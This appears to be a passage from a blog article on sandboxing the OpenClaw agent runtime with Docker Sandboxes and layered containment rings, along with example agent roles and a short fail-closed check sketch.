    agents.defaults.sandbox.scope: "session"

Each session receives its own sandbox container.

This isolates agent actions, but the gateway process still runs outside the sandbox.

Docker Sandboxes

Docker recently introduced Docker Sandboxes specifically for AI workloads. A Docker Sandbox runs the agent inside a micro-VM style environment with strict boundaries.

Architecture:

    Host
      ↓
    Docker Sandbox
      ↓
    OpenClaw Runtime
      ↓
    Agent Tools

This environment provides stronger isolation:

- restricted filesystem access

- network proxy and allowlists

- external secret injection

- workspace-only file access

Secrets are injected from outside the sandbox rather than being stored in the runtime. Network access can be restricted to specific domains such as model providers or internal APIs. This shifts containment from policy to infrastructure. Instead of telling the agent not to do something, the environment simply prevents it.

The Containment Model That Makes Sense

The safest approach combines these layers.

    Docker Sandbox
      ↓
    OpenClaw Runtime
      ↓
    OpenClaw Tool Sandbox
      ↓
    Agent Tools

This creates multiple containment rings.

Ring 1 — Docker Sandbox

Ring 2 — OpenClaw tool sandbox

Ring 3 — tool allowlists

Ring 4 — network restrictions

Ring 5 — human approval gates

Each ring assumes the ring inside it may fail. That’s how you design systems around stochastic components.
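The layering idea can be illustrated with a small sketch in which every ring is an independent check and any single failure blocks the action. Only the three software-level rings (tool allowlists, network restrictions, human approval) are modeled; the outer sandbox rings are enforced by the environment and cannot be represented as functions. The check functions and the action fields are hypothetical stand-ins.

```javascript
// Independent checks, one per ring. None of them trusts another ring's verdict.
const rings = [
  { name: "tool allowlist", check: (a) => ["read", "write", "exec"].includes(a.tool) },
  { name: "network restrictions", check: (a) => !a.host || a.host === "api.anthropic.com" },
  { name: "human approval", check: (a) => !a.destructive || a.approved === true },
];

// An action proceeds only if every ring passes. A ring that throws counts as a denial.
function evaluate(action, rings) {
  for (const ring of rings) {
    let ok = false;
    try {
      ok = ring.check(action) === true;
    } catch {
      ok = false; // fail closed
    }
    if (!ok) return { allowed: false, blockedBy: ring.name };
  }
  return { allowed: true, blockedBy: null };
}
```

The important property is that the rings fail closed: a broken or misconfigured check blocks the action instead of waving it through.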

Where OpenClaw Actually Becomes Useful

Once it’s contained, OpenClaw becomes a programmable operator. The value comes from defining skills that match the workflows you already run.

Engineering Agent

Skills:

- git

- test runner

- code review

- CI

Tasks:

- review pull requests

- generate architecture summaries

- run test suites

- produce coverage reports

Example:

review this PR and summarize the architectural impact

Research Agent

Skills:

- web search

- summarization

- synthesis

- writing

Typical workflow:

- gather sources

- summarize them

- extract insights

- draft documents

Operations Agent

Skills:

- calendar

- meeting summarization

- task management

Tasks:

- triage inbox

- extract action items

- schedule meetings

- produce summaries

Product Strategy Agent

Skills:

- market research

- competitor analysis

- financial modeling

- feedback synthesis

Outputs:

- product briefs

- experiment plans

- roadmap drafts

Structuring an Agent Runtime

For larger systems, it helps to treat the runtime as infrastructure hosting multiple agents.

Example:

    Runtime
      research agent
      engineering agent
      planning agent
      writing agent

Each agent has:

- its own prompt

- its own skills

- the same runtime environment

The runtime provides infrastructure. The agents provide behavior.

A Note on Maturity

OpenClaw is still early. The capabilities are powerful, but the ecosystem is not hardened yet.

Security researchers are already demonstrating how prompt injection and malicious skills can manipulate agents with broad access. That doesn’t mean the system shouldn’t be used. It means the system should be designed with containment in mind from the start.

The Opportunity

The real opportunity isn’t running a single agent. The interesting direction is combining agent runtimes with orchestration and evaluation systems.

Example architecture:

    Agent Runtime
      ↓
    Workflow Engine
      ↓
    Tool Execution
      ↓
    Evaluation Loop

That changes the role of the agent. Instead of being an assistant, it becomes a component inside a controlled operational system. At that point you’re no longer experimenting with AI tools. You’re building infrastructure around them.

Let’s talk about it.
